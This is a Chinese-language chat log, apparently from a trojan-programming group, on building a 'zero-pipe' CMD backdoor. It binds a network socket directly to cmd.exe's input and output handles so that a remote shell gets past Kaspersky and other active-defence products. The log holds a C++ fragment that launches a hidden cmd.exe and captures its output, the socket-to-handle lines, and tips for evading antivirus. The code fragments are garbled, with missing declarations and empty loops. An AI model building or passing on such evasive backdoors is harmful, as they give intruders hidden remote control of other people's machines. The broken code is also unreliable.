技術討論關於零管道CMD後門

2021-04-13 06:15:55 字數 2835 閱讀 3644

冷風草草細說下零管道 關注........

.μρ2ц清風

這個不光過卡巴了,,,基本上所有主動防禦都過!!

包口s**,微點,,,

夕草hot patching

.μρ2ц清風

對啊..

冷風用socket直接替換輸入輸出的handle,可以實現零管道

sulwan

顛覆核心程式設計啊

.μρ2ц清風

反正我是用零管道的..

幻影si.hstdinput=hrp1;

si.hstdoutput=hwp2;

幻影是格handle

.μρ2ц清風

呵呵,,有一點點小資料,,不過看不明白!!

幻影而socket是整形吧?

夕草黑防有文章介紹過

夕草socket 是 unsigned long

幻影對啊

你的意思是

si.hstdinput=sock1;

si.hstdoutput=sock1;

sulwan

整形lenk

做管道通訊?

sulwan

沒錯sulwan

socket socket(

int af,      

int type,    

int protocol 

);問下,可以理解這樣嗎

冷風呵呵明白了....

.μρ2ц清風

int ccmdline::dosshell(char *command)

;     //命令列緩衝

byte sendbuf[2048]=;    //傳送緩衝

security_attributes sa;     //安全描述符

dword bytesread=0;

std::string strbuffer;

sa.nlength=sizeof(security_attributes);

sa.lpsecuritydescriptor=null;

sa.binherithandle=true;

//建立匿名管道

if (!createpipe(&hread,&hwrite,&sa,0)) 

goto clean;//失敗

si.cb=sizeof(startupinfo);

getstartupinfo(&si);

si.hstderror=hwrite;

si.hstdoutput=hwrite;    //程序(cmd)的輸出寫入管道

si.wshowwindow=sw_hide;

si.dwflags=startf_useshowwindow | startf_usestdhandles;

getsystemdirectory(cmdline,sizeof (cmdline));   //獲取系統目錄

strcat(cmdline,"//cmd.exe /c ");                //拼接cmd

strcat(cmdline,command);  //拼接一條完整的cmd命令

//建立程序,也就是執行cmd命令

if (!createprocess(null,cmdline,null,null,true,null,null,null,&si,&pi))

goto clean;//失敗

closehandle(hwrite);

while (true)

clean:

if (hread!=null)

closehandle(hread);

if (hwrite!=null)

closehandle(hwrite);

return true;}幻影

這**什麼意思?

幻影零管道?

.μρ2ц清風

零管道!!

夕草就是把socket強制轉換為handle型別

幻影不是吧,這樣能過卡吧了?

.μρ2ц清風

夕草在說什麼呢??

夕草不是過咔吧,我只是說零管道

.μρ2ц清風

呵呵,你自己測試過不過卡巴咯..

夕草過卡巴,可以拷貝cmd.exe為abc.exe啊

幻影(hwrite); 根本沒有用啊啊

sulwan

你這樣做記憶體消耗大嗎

夕草startupinfo.hstdinput = (handle)sclient;

幻影可以拷貝cmd.exe為abc.exe啊--貌似沒用,我這樣用還是提示

.μρ2ц清風

零管道,不是我理解錯了把..

只是建立乙個pipe,卡巴之監控建立兩個pipe的**,,

不關socket的事!!!你拷貝cmd為其他名字一樣監控..

夕草零管道就是不用建立管道

lenk

晚點再來。朋友們,慢慢討論

.μρ2ц清風

他的流程是之建立cmd,然後執行命令,把管道裡的資料讀出來,,,關閉管道!!傳送讀到的資料!

.μρ2ц清風

暈,是不是我理解錯了..零管道還有其他的說法??

sulwan

汗!我看我的思維是不行了!長見識了

夕草零管道就是不用createpipe了

直接用socket接管輸入輸出控制代碼

.μρ2ц清風

好了,我回頭再看看資料..也不用爭論了,能過卡巴就是好馬..哈哈!!

blackfeather

趕緊學習···

結帖了 呵呵 零管道理解成幻影的可以吧

si.hstdinput=sock1;

si.hstdoutput=sock1;

by 木馬程式設計技術討論群 (44390702)

技術討論關於零管道CMD後門

冷風 草草細說下零管道 關注.2 清風 這個不光過卡巴了,基本上所有主動防禦都過 包口s 微點,夕草hot patching 2 清風 對啊.冷風用socket直接替換輸入輸出的handle,可以實現零管道 sulwan 顛覆核心程式設計啊 2 清風 反正我是用零管道的.幻影si.hstdinput...

技術討論 關於低耦合開發的討論

技術討論 關於低耦合開發的討論 丁丁 15 15 50 求知誰體會過低耦合帶來的好處我怎麼覺得現在接觸到的專案都是遷一發 動全身呢 青潤 15 17 03 你是全新專案,還是歷史專案改造?丁丁 15 17 19 新的繼承抽象和介面的方式完全體現不出多麼易於修改 丁丁 15 18 38 只要有變更涉及...

1k 程式體積1kb 反向連線,零管道後門

1k 程式體積1kb 反向連線,零管道後門 寫shellcode的時候寫的 c版本 沒用就丟出來了 code 1k 程式體積1kb 反向連線,零管道後門 by anskya 說明 不用我多說了吧.黑客一般都會使用的後門程式.這裡只是簡單的演示一下.沒有新增程序隱藏功能 程式可以在win9x,win2...